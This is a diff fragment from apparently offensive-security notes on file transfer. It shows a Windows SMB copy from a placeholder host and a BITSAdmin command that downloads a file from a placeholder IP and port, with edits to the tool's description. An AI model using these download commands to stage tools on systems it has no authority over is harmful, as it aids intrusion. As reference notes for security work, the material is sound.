Qazeer/InfoSec-Notes/General/File_Transfer.md

 copy \\<HOSTNAME | IP>\<SHARE_NAME>\<FILE> .
 ```

 ###### [Windows] BITSAdmin

-`BITSAdmin` is a Windows command-line tool that can be uses to create download
+`BITSAdmin` is a Windows command-line built-in utility that can be used to
-or upload files.
+create, download or upload files.

+Note that `BITSAdmin` will not attempt the download if the security context
+under which its executed does not have the permission to write files on the
+specified output path.

 ```
 bitsadmin /transfer job http://<IP>:<PORT>/<FILE> <OUTPUT_FILE_PATH>